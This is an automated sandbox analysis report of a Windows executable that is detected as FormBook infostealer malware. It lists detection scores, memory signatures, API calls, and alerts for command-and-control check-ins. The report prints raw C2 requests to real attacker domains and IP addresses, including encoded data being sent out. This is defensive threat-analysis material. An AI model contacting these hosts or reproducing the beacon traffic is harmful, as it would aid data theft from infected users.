Windows Analysis Report
INQUIRY 02825 AISISAE 9310.exe

AV Detection

Source: INQUIRY 02825 AISISAE 9310.exe

Avira: detected

Source: INQUIRY 02825 AISISAE 9310.exe	Virustotal: Detection: 53%			Perma Link
Source: INQUIRY 02825 AISISAE 9310.exe	ReversingLabs: Detection: 58%

Source: Yara match	File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Compliance

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY 02825 AISISAE 9310.exe, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdb source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gBSE2iEQW.exe, 00000007.00000000.1601710606.000000000030F000.00000002.00000001.01000000.00000005.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762176946.000000000030F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: sdiagnhost.pdbGCTL source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Code function: 8_2_02BACD40 FindFirstFileW,FindNextFileW,FindClose,

8_2_02BACD40

Software Vulnerabilities

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 4x nop then xor eax, eax		8_2_02B99FC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 4x nop then pop edi		8_2_02B9E8C4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 4x nop then mov ebx, 00000004h		8_2_04B604CE

Networking

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49725 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49727 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49724 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49723 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49728 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49730 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49726 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49731 -> 15.197.148.33:80

Source: Joe Sandbox View	IP Address: 15.197.148.33 15.197.148.33
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 74.208.236.36 74.208.236.36

Source: Joe Sandbox View

ASN Name: TANDEMUS TANDEMUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /tsak/?Oh44=V2GdJFVxnvwp5&JNiPg=YQHVXA7vk5Ejd4ZI1zcMQi9WtUWM1HJ5GkASxIA+KfBd6gRSELiW++EKJDSr3fSHhVfVzVIMxi/ALCU2icaE1H+f7Fhozj6HyTo+MG9+YFBrLfLyAWvdIJY= HTTP/1.1Host: www.dramavietsub.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xumw/?JNiPg=6nidXIeTjwp+/8jOwEASM9o1nZX2cytP12WwgCMMdzORX2Ri86uOscPEUO1eXyN18jrqCkChD4uO80oJ0ZYE6dJtCQhaO7L9sBhghid2pa1G5t+t4sRy24o=&Oh44=V2GdJFVxnvwp5 HTTP/1.1Host: www.truenorthcards.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4132/?JNiPg=SIKt0PplAcX2tlTtKDgwrepqNkvE+VzalCBUBKLKHPFwsgz0Xvd9+/M3aHJpe/gMB2zKKmKQxYTQsJSvf7VUuXfsdUkPz/7Uk916yFL2WDJE7L5uZ6NnSA0=&Oh44=V2GdJFVxnvwp5 HTTP/1.1Host: www.atepl.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.dramavietsub.net
Source: global traffic	DNS traffic detected: DNS query: www.truenorthcards.org
Source: global traffic	DNS traffic detected: DNS query: www.atepl.info

Source: unknown

HTTP traffic detected: POST /xumw/ HTTP/1.1Host: www.truenorthcards.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.truenorthcards.orgReferer: http://www.truenorthcards.org/xumw/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 4a 4e 69 50 67 3d 33 6c 4b 39 55 38 6d 47 74 41 5a 5a 7a 37 69 67 35 53 34 78 4e 50 30 62 69 4b 6d 73 58 42 74 47 2f 57 4c 37 32 44 64 50 58 6c 47 74 62 6e 68 6d 37 59 6a 75 6b 63 50 75 41 4f 78 5a 4f 55 64 63 36 41 2f 58 4c 6c 76 4b 5a 36 6e 4d 39 48 6b 42 67 34 34 4d 6f 50 51 62 64 6a 68 6c 54 70 58 44 72 68 63 77 6a 53 52 64 79 6f 39 2b 36 6f 4b 79 77 4b 34 77 34 66 64 6d 33 79 65 50 4f 64 74 5a 4b 34 51 47 58 2b 77 7a 64 4f 4c 58 30 43 4d 74 7a 4b 50 73 4e 63 55 47 59 45 36 72 65 36 71 6c 76 4c 4d 34 70 42 31 2f 78 77 4c 49 59 6c 42 76 46 6e 38 7a 33 42 61 35 78 2f 65 4e 6d 54 44 68 43 77 3d 3d Data Ascii: JNiPg=3lK9U8mGtAZZz7ig5S4xNP0biKmsXBtG/WL72DdPXlGtbnhm7YjukcPuAOxZOUdc6A/XLlvKZ6nM9HkBg44MoPQbdjhlTpXDrhcwjSRdyo9+6oKywK4w4fdm3yePOdtZK4QGX+wzdOLX0CMtzKPsNcUGYE6re6qlvLM4pB1/xwLIYlBvFn8z3Ba5x/eNmTDhCw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 05:40:08 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 05:40:11 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 05:40:13 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 05:40:16 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Source: gBSE2iEQW.exe, 00000009.00000002.2484249497.00000000056D1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.atepl.info
Source: gBSE2iEQW.exe, 00000009.00000002.2484249497.00000000056D1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.atepl.info/4132/
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: sdiagnhost.exe, 00000008.00000002.2480736638.00000000030D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdiagnhost.exe, 00000008.00000002.2480736638.00000000030D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdiagnhost.exe, 00000008.00000002.2480736638.00000000030FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdiagnhost.exe, 00000008.00000003.1871304633.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud

Source: Yara match	File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0007D003 NtClose,		0_2_0007D003
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2B60 NtClose,LdrInitializeThunk,		0_2_019D2B60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2DF0 NtQuerySystemInformation,LdrInitializeThunk,		0_2_019D2DF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2C70 NtFreeVirtualMemory,LdrInitializeThunk,		0_2_019D2C70
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D35C0 NtCreateMutant,LdrInitializeThunk,		0_2_019D35C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D4340 NtSetContextThread,		0_2_019D4340
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D4650 NtSuspendThread,		0_2_019D4650
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2B80 NtQueryInformationFile,		0_2_019D2B80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2BA0 NtEnumerateValueKey,		0_2_019D2BA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2BF0 NtAllocateVirtualMemory,		0_2_019D2BF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2BE0 NtQueryValueKey,		0_2_019D2BE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2AB0 NtWaitForSingleObject,		0_2_019D2AB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2AD0 NtReadFile,		0_2_019D2AD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2AF0 NtWriteFile,		0_2_019D2AF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2DB0 NtEnumerateKey,		0_2_019D2DB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2DD0 NtDelayExecution,		0_2_019D2DD0
